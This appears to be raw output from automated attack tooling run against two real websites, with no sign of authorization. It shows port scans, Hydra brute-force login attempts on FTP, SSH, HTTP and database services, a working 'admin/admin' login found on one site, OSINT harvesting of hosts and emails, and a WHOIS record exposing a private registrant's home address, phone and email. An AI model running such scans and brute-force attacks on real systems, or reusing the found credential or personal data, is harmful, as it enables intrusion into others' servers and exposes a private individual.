  3630. +----------+--------------------+-------------------+----------+----------+
  3631.  + -- ----------------------------=[Skipping Full NMap Port Scan]=------------ -- +
  3632.  + -- ----------------------------=[Running Brute Force]=--------------------- -- +
  3633.  __________ __ ____ ___
  3634.  \______ \_______ __ ___/ |_ ____ \ \/ /
  3635.  | | _/\_ __ \ | \ __\/ __ \ \ / 
  3636.  | | \ | | \/ | /| | \ ___/ / \ 
  3637.  |______ / |__| |____/ |__| \___ >___/\ \ 
  3638.  \/ \/ \_/
  3639.  
  3640.  + -- --=[BruteX v1.7 by 1N3
  3641.  + -- --=[http://crowdshield.com
  3642.  
  3643.  
  3644. ################################### Running Port Scan ##############################
  3645.  
  3646. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-06 00:52 EST
  3647. Nmap scan report for benedictpatrick.com (185.119.174.103)
  3648. Host is up (0.099s latency).
  3649. Other addresses for benedictpatrick.com (not scanned): 2a01:9cc0:0:1:1a:3:0:5e
  3650. rDNS record for 185.119.174.103: web564.webfaction.com
  3651. Not shown: 20 filtered ports
  3652. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  3653. PORT STATE SERVICE
  3654. 21/tcp open ftp
  3655. 22/tcp open ssh
  3656. 80/tcp open http
  3657. 443/tcp open https
  3658. 3306/tcp open mysql
  3659. 5432/tcp open postgresql
  3660.  
  3661. Nmap done: 1 IP address (1 host up) scanned in 1.46 seconds
  3662.  
  3663. ################################### Running Brute Force ############################
  3664.  
  3665.  + -- --=[Port 21 opened... running tests...
  3666. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  3667.  
  3668. Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-06 00:52:22
  3669. [DATA] max 1 task per 1 server, overall 1 task, 30 login tries, ~30 tries per task
  3670. [DATA] attacking ftp://benedictpatrick.com:21/
  3671. 1 of 1 target completed, 0 valid passwords found
  3672. Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-06 00:53:11
  3673.  + -- --=[Port 22 opened... running tests...
  3674. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  3675.  
  3676. Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-06 00:53:11
  3677. [DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
  3678. [DATA] attacking ssh://benedictpatrick.com:22/
  3679. [STATUS] 16.00 tries/min, 16 tries in 00:01h, 1480 to do in 01:33h, 1 active
  3680. [STATUS] 15.00 tries/min, 45 tries in 00:03h, 1451 to do in 01:37h, 1 active
  3681. [STATUS] 15.00 tries/min, 105 tries in 00:07h, 1391 to do in 01:33h, 1 active
  3682. [STATUS] 15.08 tries/min, 181 tries in 00:12h, 1315 to do in 01:28h, 1 active
  3683. [STATUS] 14.88 tries/min, 253 tries in 00:17h, 1243 to do in 01:24h, 1 active
  3684. [STATUS] 14.95 tries/min, 329 tries in 00:22h, 1167 to do in 01:19h, 1 active
  3685. [STATUS] 14.93 tries/min, 403 tries in 00:27h, 1093 to do in 01:14h, 1 active
  3686. [STATUS] 14.38 tries/min, 460 tries in 00:32h, 1036 to do in 01:13h, 1 active
  3687. [STATUS] 13.08 tries/min, 484 tries in 00:37h, 1012 to do in 01:18h, 1 active
  3688. [STATUS] 12.50 tries/min, 525 tries in 00:42h, 971 to do in 01:18h, 1 active
  3689. [STATUS] 11.74 tries/min, 552 tries in 00:47h, 944 to do in 01:21h, 1 active
  3690. [STATUS] 11.25 tries/min, 585 tries in 00:52h, 911 to do in 01:21h, 1 active
  3691. [STATUS] 11.25 tries/min, 641 tries in 00:57h, 855 to do in 01:17h, 1 active
  3692. [STATUS] 11.19 tries/min, 694 tries in 01:02h, 802 to do in 01:12h, 1 active
  3693. [STATUS] 10.63 tries/min, 712 tries in 01:07h, 786 to do in 01:14h, 1 active
  3694. [STATUS] 10.57 tries/min, 761 tries in 01:12h, 738 to do in 01:10h, 1 active
  3695. [STATUS] 10.65 tries/min, 820 tries in 01:17h, 679 to do in 01:04h, 1 active
  3696. [STATUS] 10.35 tries/min, 849 tries in 01:22h, 650 to do in 01:03h, 1 active
  3697. [STATUS] 10.53 tries/min, 916 tries in 01:27h, 583 to do in 00:56h, 1 active
  3698. [STATUS] 10.59 tries/min, 974 tries in 01:32h, 525 to do in 00:50h, 1 active
  3699. [STATUS] 10.41 tries/min, 1010 tries in 01:37h, 489 to do in 00:47h, 1 active
  3700. [STATUS] 10.61 tries/min, 1082 tries in 01:42h, 417 to do in 00:40h, 1 active
  3701. [STATUS] 10.80 tries/min, 1156 tries in 01:47h, 343 to do in 00:32h, 1 active
  3702. [STATUS] 10.97 tries/min, 1229 tries in 01:52h, 270 to do in 00:25h, 1 active
  3703. [STATUS] 11.15 tries/min, 1305 tries in 01:57h, 194 to do in 00:18h, 1 active
  3704. [STATUS] 11.30 tries/min, 1379 tries in 02:02h, 120 to do in 00:11h, 1 active
  3705. [STATUS] 11.33 tries/min, 1394 tries in 02:03h, 105 to do in 00:10h, 1 active
  3706. [STATUS] 11.35 tries/min, 1407 tries in 02:04h, 92 to do in 00:09h, 1 active
  3707. [STATUS] 11.39 tries/min, 1424 tries in 02:05h, 75 to do in 00:07h, 1 active
  3708. [STATUS] 11.41 tries/min, 1438 tries in 02:06h, 61 to do in 00:06h, 1 active
  3709. [STATUS] 11.43 tries/min, 1451 tries in 02:07h, 48 to do in 00:05h, 1 active
  3710. [STATUS] 11.47 tries/min, 1468 tries in 02:08h, 31 to do in 00:03h, 1 active
  3711. [STATUS] 11.50 tries/min, 1483 tries in 02:09h, 16 to do in 00:02h, 1 active
  3712. 1 of 1 target completed, 0 valid passwords found
  3713. Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-06 03:03:11
  3714.  + -- --=[Port 23 closed... skipping.
  3715.  + -- --=[Port 25 closed... skipping.
  3716.  + -- --=[Port 80 opened... running tests...
  3717. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  3718.  
  3719. Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-06 03:03:11
  3720. [DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
  3721. [DATA] attacking http-get://benedictpatrick.com:80//
  3722. [80][http-get] host: benedictpatrick.com login: admin password: admin
  3723. [STATUS] attack finished for benedictpatrick.com (valid pair found)
  3724. 1 of 1 target successfully completed, 1 valid password found
  3725. Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-06 03:03:16
  3726.  + -- --=[Port 110 closed... skipping.
  3727.  + -- --=[Port 139 closed... skipping.
  3728.  + -- --=[Port 162 closed... skipping.
  3729.  + -- --=[Port 389 closed... skipping.
  3730.  + -- --=[Port 443 opened... running tests...
  3731. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  3732.  
  3733. Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-06 03:03:16
  3734. [DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
  3735. [DATA] attacking http-gets://benedictpatrick.com:443//
  3736. [STATUS] 66.00 tries/min, 66 tries in 00:01h, 1430 to do in 00:22h, 1 active
  3737. [STATUS] 67.00 tries/min, 201 tries in 00:03h, 1295 to do in 00:20h, 1 active
  3738. [STATUS] 68.29 tries/min, 478 tries in 00:07h, 1018 to do in 00:15h, 1 active
  3739. [STATUS] 77.50 tries/min, 930 tries in 00:12h, 566 to do in 00:08h, 1 active
  3740. [STATUS] 81.12 tries/min, 1379 tries in 00:17h, 117 to do in 00:02h, 1 active
  3741. [STATUS] 81.56 tries/min, 1468 tries in 00:18h, 28 to do in 00:01h, 1 active
  3742. [STATUS] 77.74 tries/min, 1477 tries in 00:19h, 19 to do in 00:01h, 1 active
  3743. 1 of 1 target completed, 0 valid passwords found
  3744. Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-06 03:22:50
  3745.  + -- --=[Port 445 closed... skipping.
  3746.  + -- --=[Port 512 closed... skipping.
  3747.  + -- --=[Port 513 closed... skipping.
  3748.  + -- --=[Port 514 closed... skipping.
  3749.  + -- --=[Port 993 closed... skipping.
  3750.  + -- --=[Port 1433 closed... skipping.
  3751.  + -- --=[Port 1521 closed... skipping.
  3752.  + -- --=[Port 3306 opened... running tests...
  3753. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  3754.  
  3755. Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-06 03:22:50
  3756. [DATA] max 1 task per 1 server, overall 1 task, 9 login tries, ~9 tries per task
  3757. [DATA] attacking mysql://benedictpatrick.com:3306/
  3758. 1 of 1 target completed, 0 valid passwords found
  3759. Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-06 03:22:53
  3760.  + -- --=[Port 3389 closed... skipping.
  3761.  + -- --=[Port 5432 opened... running tests...
  3762. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  3763.  
  3764. Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-06 03:22:53
  3765. [DATA] max 1 task per 1 server, overall 1 task, 18 login tries, ~18 tries per task
  3766. [DATA] attacking postgres://benedictpatrick.com:5432/
  3767. 1 of 1 target completed, 0 valid passwords found
  3768. Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-06 03:23:00
  3769.  + -- --=[Port 5900 closed... skipping.
  3770.  + -- --=[Port 5901 closed... skipping.
  3771.  + -- --=[Port 8000 closed... skipping.
  3772.  + -- --=[Port 8080 closed... skipping.
  3773.  + -- --=[Port 8100 closed... skipping.
  3774.  + -- --=[Port 6667 closed... skipping.
  3775. #######################################################################################################################################
  3776. Hostname wordofknowledgeministries.com ISP Sucuri (AS30148)
  3777. Continent North America Flag
  3778. US
  3779. Country United States Country Code US (USA)
  3780. Region Unknown Local time 05 Jan 2018 22:00 CST
  3781. Metropolis Unknown Postal Code Unknown
  3782. City Unknown Latitude 37.751
  3783. IP Address 192.124.249.7 Longitude -97.822
  3784. #######################################################################################################################################
  3785. [i] Scanning Site: https://wordofknowledgeministries.com
  3786.  
  3787.  
  3788.  
  3789. B A S I C I N F O
  3790. ====================
  3791.  
  3792.  
  3793. [+] Site Title:
  3794. [+] IP address: 192.124.249.7
  3795. [+] Web Server: nginx
  3796. [+] CMS: Could Not Detect
  3797. [+] Cloudflare: Not Detected
  3798. [+] Robots File: Could NOT Find robots.txt!
  3799.  
  3800.  
  3801.  
  3802.  
  3803. W H O I S L O O K U P
  3804. ========================
  3805.  
  3806. Domain Name: WORDOFKNOWLEDGEMINISTRIES.COM
  3807. Registry Domain ID: 1612387080_DOMAIN_COM-VRSN
  3808. Registrar WHOIS Server: whois.enom.com
  3809. Registrar URL: http://www.enom.com
  3810. Updated Date: 2017-07-25T08:12:05Z
  3811. Creation Date: 2010-08-23T14:37:05Z
  3812. Registry Expiry Date: 2018-08-23T14:37:05Z
  3813. Registrar: eNom, Inc.
  3814. Registrar IANA ID: 48
  3815. Registrar Abuse Contact Email:
  3816. Registrar Abuse Contact Phone:
  3817. Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
  3818. Name Server: NS3.INETU.NET
  3819. Name Server: NS4.INETU.NET
  3820. DNSSEC: unsigned
  3821. URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
  3822. >>> Last update of whois database: 2018-01-06T04:02:57Z <<<
  3823.  
  3824. For more information on Whois status codes, please visit https://icann.org/epp
  3825.  
  3826. NOTICE: The expiration date displayed in this record is the date the
  3827. registrar's sponsorship of the domain name registration in the registry is
  3828. currently set to expire. This date does not necessarily reflect the expiration
  3829. date of the domain name registrant's agreement with the sponsoring
  3830. registrar. Users may consult the sponsoring registrar's Whois database to
  3831. view the registrar's reported date of expiration for this registration.
  3832.  
  3833.  
  3834. The Registry database contains ONLY .COM, .NET, .EDU domains and
  3835. Registrars.
  3836.  
  3837.  
  3838.  
  3839.  
  3840. G E O I P L O O K U P
  3841. =========================
  3842.  
  3843. [i] IP Address: 192.124.249.7
  3844. [i] Country: US
  3845. [i] State: N/A
  3846. [i] City: N/A
  3847. [i] Latitude: 37.750999
  3848. [i] Longitude: -97.821999
  3849.  
  3850.  
  3851.  
  3852.  
  3853. H T T P H E A D E R S
  3854. =======================
  3855.  
  3856.  
  3857. [i] HTTP/1.1 403 Forbidden
  3858. [i] Server: nginx
  3859. [i] Date: Sat, 06 Jan 2018 04:03:13 GMT
  3860. [i] Content-Type: text/html
  3861. [i] Content-Length: 2136
  3862. [i] Connection: close
  3863. [i] Vary: Accept-Encoding
  3864. [i] X-Sucuri-ID: 14007
  3865.  
  3866.  
  3867.  
  3868.  
  3869. D N S L O O K U P
  3870. ===================
  3871.  
  3872. wordofknowledgeministries.com. 3599 IN MX 10 mail.wordofknowledgeministries.com.
  3873. wordofknowledgeministries.com. 3599 IN A 192.124.249.7
  3874. wordofknowledgeministries.com. 3599 IN SOA ns3.inetu.net. dns.inetu.net. 2017010400 3600 300 86400 3600
  3875. wordofknowledgeministries.com. 3599 IN NS ns3.inetu.net.
  3876. wordofknowledgeministries.com. 3599 IN NS ns4.inetu.net.
  3877.  
  3878.  
  3879.  
  3880.  
  3881. S U B N E T C A L C U L A T I O N
  3882. ====================================
  3883.  
  3884. Address = 192.124.249.7
  3885. Network = 192.124.249.7 / 32
  3886. Netmask = 255.255.255.255
  3887. Broadcast = not needed on Point-to-Point links
  3888. Wildcard Mask = 0.0.0.0
  3889. Hosts Bits = 0
  3890. Max. Hosts = 1 (2^0 - 0)
  3891. Host Range = { 192.124.249.7 - 192.124.249.7 }
  3892.  
  3893.  
  3894.  
  3895. N M A P P O R T S C A N
  3896. ============================
  3897.  
  3898.  
  3899. Starting Nmap 7.01 ( https://nmap.org ) at 2018-01-06 04:03 UTC
  3900. Nmap scan report for wordofknowledgeministries.com (192.124.249.7)
  3901. Host is up (0.0019s latency).
  3902. rDNS record for 192.124.249.7: cloudproxy10007.sucuri.net
  3903. PORT STATE SERVICE VERSION
  3904. 21/tcp filtered ftp
  3905. 22/tcp filtered ssh
  3906. 23/tcp filtered telnet
  3907. 25/tcp filtered smtp
  3908. 80/tcp open http nginx
  3909. 110/tcp filtered pop3
  3910. 143/tcp filtered imap
  3911. 443/tcp open ssl/http nginx
  3912. 445/tcp filtered microsoft-ds
  3913. 3389/tcp filtered ms-wbt-server
  3914.  
  3915. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  3916. Nmap done: 1 IP address (1 host up) scanned in 13.83 seconds
  3917.  
  3918. [!] IP Address : 192.124.249.7
  3919. [!] wordofknowledgeministries.com doesn't seem to use a CMS
  3920. [+] Honeypot Probabilty: 0%
  3921. ----------------------------------------
  3922. PORT STATE SERVICE VERSION
  3923. 21/tcp filtered ftp
  3924. 22/tcp filtered ssh
  3925. 23/tcp filtered telnet
  3926. 25/tcp filtered smtp
  3927. 80/tcp open http nginx
  3928. 110/tcp filtered pop3
  3929. 143/tcp filtered imap
  3930. 443/tcp open ssl/http nginx
  3931. 445/tcp filtered microsoft-ds
  3932. 3389/tcp filtered ms-wbt-server
  3933. ----------------------------------------
  3934.  
  3935. [+] DNS Records
  3936. ns4.inetu.net. (74.85.141.4) AS20284 INETu, Inc. United States
  3937. ns3.inetu.net. (74.85.141.3) AS20284 INETu, Inc. United States
  3938.  
  3939. [+] MX Records
  3940. 10 (192.124.249.7) AS30148 Sucuri United States
  3941.  
  3942. [+] Host Records (A)
  3943. wordofknowledgeministries.com (cloudproxy10007.sucuri.net) (192.124.249.7) AS30148 Sucuri United States
  3944.  
  3945. [+] TXT Records
  3946.  
  3947. [+] DNS Map: https://dnsdumpster.com/static/map/wordofknowledgeministries.com.png
  3948.  
  3949. [>] Initiating 3 intel modules
  3950. [>] Loading Alpha module (1/3)
  3951. [>] Beta module deployed (2/3)
  3952. [>] Gamma module initiated (3/3)
  3953.  
  3954.  
  3955. [+] Emails found:
  3956. ------------------
  3957. contact@wordofknowledgeministries.com
  3958.  
  3959. [+] Hosts found in search engines:
  3960. ------------------------------------
  3961. [-] Resolving hostnames IPs...
  3962. 192.124.249.7:www.wordofknowledgeministries.com
  3963. [+] Virtual hosts:
  3964. -----------------
  3965. 192.124.249.7 videomasti
  3966. 192.124.249.7 www.filmtools
  3967. 192.124.249.7 www.plantation
  3968. 192.124.249.7 gruenehall
  3969. 192.124.249.7 www.heyitsfree.net
  3970. 192.124.249.7 www.hunkstheshow
  3971. 192.124.249.7 www.adventurouskate
  3972. 192.124.249.7 www.thepublicdiscourse
  3973. 192.124.249.7 www.ruderfinn
  3974. 192.124.249.7 oceanreefclub
  3975. 192.124.249.7 wwsmjatc.org
  3976. 192.124.249.7 www.northyorks.gov.uk
  3977. 192.124.249.7 www.thepublicdiscourse.com
  3978. 192.124.249.7 dh-web.org
  3979. 192.124.249.7 brulosophy.com
  3980. 192.124.249.7 www.micacontrols.com
  3981. 192.124.249.7 homebrewacademy.com
  3982. 192.124.249.7 www.greenpeace
  3983. 192.124.249.7 www.thyroid
  3984. 192.124.249.7 www.thyroidmanager.org
  3985. 192.124.249.7 www.sanidumps
  3986. 192.124.249.7 www.abandomoviez.net
  3987. 192.124.249.7 lakewoodhospital
  3988. [92m + -- ----------------------------=[Running Nslookup]=------------------------ -- +
  3989. Server: 192.168.1.254
  3990. Address: 192.168.1.254#53
  3991.  
  3992. Non-authoritative answer:
  3993. Name: wordofknowledgeministries.com
  3994. Address: 192.124.249.7
  3995.  
  3996. wordofknowledgeministries.com has address 192.124.249.7
  3997. wordofknowledgeministries.com mail is handled by 10 mail.wordofknowledgeministries.com.
  3998.  + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +
  3999.  
  4000. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
  4001.  
  4002. [+] Target is wordofknowledgeministries.com
  4003. [+] Loading modules.
  4004. [+] Following modules are loaded:
  4005. [x] [1] ping:icmp_ping - ICMP echo discovery module
  4006. [x] [2] ping:tcp_ping - TCP-based ping discovery module
  4007. [x] [3] ping:udp_ping - UDP-based ping discovery module
  4008. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
  4009. [x] [5] infogather:portscan - TCP and UDP PortScanner
  4010. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
  4011. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
  4012. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
  4013. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
  4014. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
  4015. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
  4016. [x] [12] fingerprint:smb - SMB fingerprinting module
  4017. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
  4018. [+] 13 modules registered
  4019. [+] Initializing scan engine
  4020. [+] Running scan engine
  4021. [-] ping:tcp_ping module: no closed/open TCP ports known on 192.124.249.7. Module test failed
  4022. [-] ping:udp_ping module: no closed/open UDP ports known on 192.124.249.7. Module test failed
  4023. [-] No distance calculation. 192.124.249.7 appears to be dead or no ports known
  4024. [+] Host: 192.124.249.7 is up (Guess probability: 50%)
  4025. [+] Target: 192.124.249.7 is alive. Round-Trip Time: 0.51162 sec
  4026. [+] Selected safe Round-Trip Time value is: 1.02323 sec
  4027. [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
  4028. [-] fingerprint:smb need either TCP port 139 or 445 to run
  4029. [+] Primary guess:
  4030. [+] Host 192.124.249.7 Running OS: <óšU (Guess probability: 100%)
  4031. [+] Other guesses:
  4032. [+] Host 192.124.249.7 Running OS: <óšU (Guess probability: 100%)
  4033. [+] Host 192.124.249.7 Running OS: <óšU (Guess probability: 100%)
  4034. [+] Host 192.124.249.7 Running OS: <óšU (Guess probability: 100%)
  4035. [+] Host 192.124.249.7 Running OS: <óšU (Guess probability: 100%)
  4036. [+] Host 192.124.249.7 Running OS: <óšU (Guess probability: 100%)
  4037. [+] Host 192.124.249.7 Running OS: <óšU (Guess probability: 100%)
  4038. [+] Host 192.124.249.7 Running OS: <óšU (Guess probability: 100%)
  4039. [+] Host 192.124.249.7 Running OS: <óšU (Guess probability: 100%)
  4040. [+] Host 192.124.249.7 Running OS: <óšU (Guess probability: 100%)
  4041. [+] Cleaning up scan engine
  4042. [+] Modules deinitialized
  4043. [+] Execution completed.
  4044.  + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +
  4045. Domain Name: WORDOFKNOWLEDGEMINISTRIES.COM
  4046. Registry Domain ID: 1612387080_DOMAIN_COM-VRSN
  4047. Registrar WHOIS Server: whois.enom.com
  4048. Registrar URL: http://www.enom.com
  4049. Updated Date: 2017-07-25T08:12:05Z
  4050. Creation Date: 2010-08-23T14:37:05Z
  4051. Registry Expiry Date: 2018-08-23T14:37:05Z
  4052. Registrar: eNom, Inc.
  4053. Registrar IANA ID: 48
  4054. Registrar Abuse Contact Email:
  4055. Registrar Abuse Contact Phone:
  4056. Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
  4057. Name Server: NS3.INETU.NET
  4058. Name Server: NS4.INETU.NET
  4059. DNSSEC: unsigned
  4060. URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
  4061. >>> Last update of whois database: 2018-01-06T04:02:13Z <<<
  4062.  
  4063. For more information on Whois status codes, please visit https://icann.org/epp
  4064.  
  4065. NOTICE: The expiration date displayed in this record is the date the
  4066. registrar's sponsorship of the domain name registration in the registry is
  4067. currently set to expire. This date does not necessarily reflect the expiration
  4068. date of the domain name registrant's agreement with the sponsoring
  4069. registrar. Users may consult the sponsoring registrar's Whois database to
  4070. view the registrar's reported date of expiration for this registration.
  4071.  
  4072. TERMS OF USE: You are not authorized to access or query our Whois
  4073. database through the use of electronic processes that are high-volume and
  4074. automated except as reasonably necessary to register domain names or
  4075. modify existing registrations; the Data in VeriSign Global Registry
  4076. Services' ("VeriSign") Whois database is provided by VeriSign for
  4077. information purposes only, and to assist persons in obtaining information
  4078. about or related to a domain name registration record. VeriSign does not
  4079. guarantee its accuracy. By submitting a Whois query, you agree to abide
  4080. by the following terms of use: You agree that you may use this Data only
  4081. for lawful purposes and that under no circumstances will you use this Data
  4082. to: (1) allow, enable, or otherwise support the transmission of mass
  4083. unsolicited, commercial advertising or solicitations via e-mail, telephone,
  4084. or facsimile; or (2) enable high volume, automated, electronic processes
  4085. that apply to VeriSign (or its computer systems). The compilation,
  4086. repackaging, dissemination or other use of this Data is expressly
  4087. prohibited without the prior written consent of VeriSign. You agree not to
  4088. use electronic processes that are automated and high-volume to access or
  4089. query the Whois database except as reasonably necessary to register
  4090. domain names or modify existing registrations. VeriSign reserves the right
  4091. to restrict your access to the Whois database in its sole discretion to ensure
  4092. operational stability. VeriSign may restrict or terminate your access to the
  4093. Whois database for failure to abide by these terms of use. VeriSign
  4094. reserves the right to modify these terms at any time.
  4095.  
  4096. The Registry database contains ONLY .COM, .NET, .EDU domains and
  4097. Registrars.
  4098.  
  4099.  
  4100. Domain Name: WORDOFKNOWLEDGEMINISTRIES.COM
  4101. Registry Domain ID: 1612387080_DOMAIN_COM-VRSN
  4102. Registrar WHOIS Server: whois.enom.com
  4103. Registrar URL: www.enom.com
  4104. Updated Date: 2017-07-25T01:12:05.00Z
  4105. Creation Date: 2010-08-23T14:37:00.00Z
  4106. Registrar Registration Expiration Date: 2018-08-23T14:37:00.00Z
  4107. Registrar: ENOM, INC.
  4108. Registrar IANA ID: 48
  4109. Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
  4110. Registry Registrant ID:
  4111. Registrant Name: RON WATLINGTON
  4112. Registrant Organization:
  4113. Registrant Street: 2406 CATAWBA LOOP
  4114. Registrant City: HARKER HEIGHTS
  4115. Registrant State/Province: TX
  4116. Registrant Postal Code: 76548
  4117. Registrant Country: US
  4118. Registrant Phone: +1.2546816743
  4119. Registrant Phone Ext:
  4120. Registrant Fax: 1.
  4121. Registrant Fax Ext:
  4122. Registrant Email: RWATLINGTON@HOT.RR.COM
  4123. Registry Admin ID:
  4124. Admin Name: RON WATLINGTON
  4125. Admin Organization:
  4126. Admin Street: 2406 CATAWBA LOOP
  4127. Admin City: HARKER HEIGHTS
  4128. Admin State/Province: TX
  4129. Admin Postal Code: 76548
  4130. Admin Country: US
  4131. Admin Phone: +1.2546816743
  4132. Admin Phone Ext:
  4133. Admin Fax: 1.
  4134. Admin Fax Ext:
  4135. Admin Email: RWATLINGTON@HOT.RR.COM
  4136. Registry Tech ID:
  4137. Tech Name: RON WATLINGTON
  4138. Tech Organization:
  4139. Tech Street: 2406 CATAWBA LOOP
  4140. Tech City: HARKER HEIGHTS
  4141. Tech State/Province: TX
  4142. Tech Postal Code: 76548
  4143. Tech Country: US
  4144. Tech Phone: +1.2546816743
  4145. Tech Phone Ext:
  4146. Tech Fax: 1.
  4147. Tech Fax Ext:
  4148. Tech Email: RWATLINGTON@HOT.RR.COM
  4149. Name Server: NS3.INETU.NET
  4150. Name Server: NS4.INETU.NET
  4151. DNSSEC: unSigned
  4152. Registrar Abuse Contact Email: abuse@enom.com
  4153. Registrar Abuse Contact Phone: +1.4252982646
  4154. URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
  4155. >>> Last update of WHOIS database: 2017-07-25T01:12:05.00Z <<<
  4156.  
  4157. For more information on Whois status codes, please visit https://icann.org/epp
  4158.  
  4159.  
  4160. The data in this whois database is provided to you for information
  4161. purposes only, that is, to assist you in obtaining information about or
  4162. related to a domain name registration record. We make this information
  4163. available "as is," and do not guarantee its accuracy. By submitting a
  4164. whois query, you agree that you will use this data only for lawful
  4165. purposes and that, under no circumstances will you use this data to: (1)
  4166. enable high volume, automated, electronic processes that stress or load
  4167. this whois database system providing you this information; or (2) allow,
  4168. enable, or otherwise support the transmission of mass unsolicited,
  4169. commercial advertising or solicitations via direct mail, electronic
  4170. mail, or by telephone. The compilation, repackaging, dissemination or
  4171. other use of this data is expressly prohibited without prior written
  4172. consent from us.
  4173.  
  4174. We reserve the right to modify these terms at any time. By submitting
  4175. this query, you agree to abide by these terms.
  4176. Version 6.3 4/3/2002
  4177.  
  4178. Get Noticed on the Internet! Increase visibility for this domain name by listing it at www.whoisbusinesslistings.com
  4179.  + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +
  4180.  
  4181. *******************************************************************
  4182. * *
  4183. * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
  4184. * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
  4185. * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
  4186. * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
  4187. * *
  4188. * TheHarvester Ver. 2.7 *
  4189. * Coded by Christian Martorella *
  4190. * Edge-Security Research *
  4191. * cmartorella@edge-security.com *
  4192. *******************************************************************
  4193.  
  4194.  
  4195. Full harvest..
  4196. [-] Searching in Google..
  4197. Searching 0 results...
  4198. Searching 100 results...
  4199. Searching 200 results...
  4200. [-] Searching in PGP Key server..
  4201. [-] Searching in Bing..
  4202. Searching 50 results...
  4203. Searching 100 results...
  4204. Searching 150 results...
  4205. Searching 200 results...
  4206. [-] Searching in Exalead..
  4207. Searching 50 results...
  4208. Searching 100 results...
  4209. Searching 150 results...
  4210. Searching 200 results...
  4211. Searching 250 results...
  4212.  
  4213.  
  4214. [+] Emails found:
  4215. ------------------
  4216. contact@wordofknowledgeministries.com
  4217.  
  4218. [+] Hosts found in search engines:
  4219. ------------------------------------
  4220. [-] Resolving hostnames IPs...
  4221. 192.124.249.7:www.wordofknowledgeministries.com
  4222. [+] Virtual hosts:
  4223. ==================
  4224. 192.124.249.7 videomasti
  4225. 192.124.249.7 www.filmtools
  4226. 192.124.249.7 www.plantation
  4227. 192.124.249.7 gruenehall
  4228. 192.124.249.7 www.heyitsfree.net
  4229. 192.124.249.7 www.hunkstheshow
  4230. 192.124.249.7 www.adventurouskate
  4231. 192.124.249.7 www.thepublicdiscourse
  4232. 192.124.249.7 www.ruderfinn
  4233. 192.124.249.7 oceanreefclub
  4234. 192.124.249.7 wwsmjatc.org
  4235. 192.124.249.7 www.northyorks.gov.uk
  4236. 192.124.249.7 www.thepublicdiscourse.com
  4237. 192.124.249.7 dh-web.org
  4238. 192.124.249.7 brulosophy.com
  4239. 192.124.249.7 www.micacontrols.com
  4240. 192.124.249.7 homebrewacademy.com
  4241. 192.124.249.7 www.greenpeace
  4242. 192.124.249.7 www.thyroid
  4243. 192.124.249.7 www.thyroidmanager.org
  4244. 192.124.249.7 www.sanidumps
  4245. 192.124.249.7 www.abandomoviez.net
  4246. 192.124.249.7 lakewoodhospital
  4247.  
  4248. ******************************************************
  4249. * /\/\ ___| |_ __ _ __ _ ___ ___ / _(_) | *
  4250. * / \ / _ \ __/ _` |/ _` |/ _ \ / _ \| |_| | | *
  4251. * / /\/\ \ __/ || (_| | (_| | (_) | (_) | _| | | *
  4252. * \/ \/\___|\__\__,_|\__, |\___/ \___/|_| |_|_| *
  4253. * |___/ *
  4254. * Metagoofil Ver 2.2 *
  4255. * Christian Martorella *
  4256. * Edge-Security.com *
  4257. * cmartorella_at_edge-security.com *
  4258. ******************************************************
  4259.  
  4260. [-] Starting online search...
  4261.  
  4262. [-] Searching for doc files, with a limit of 200
  4263. Searching 100 results...
  4264. Searching 200 results...
  4265. Results: 0 files found
  4266. Starting to download 50 of them:
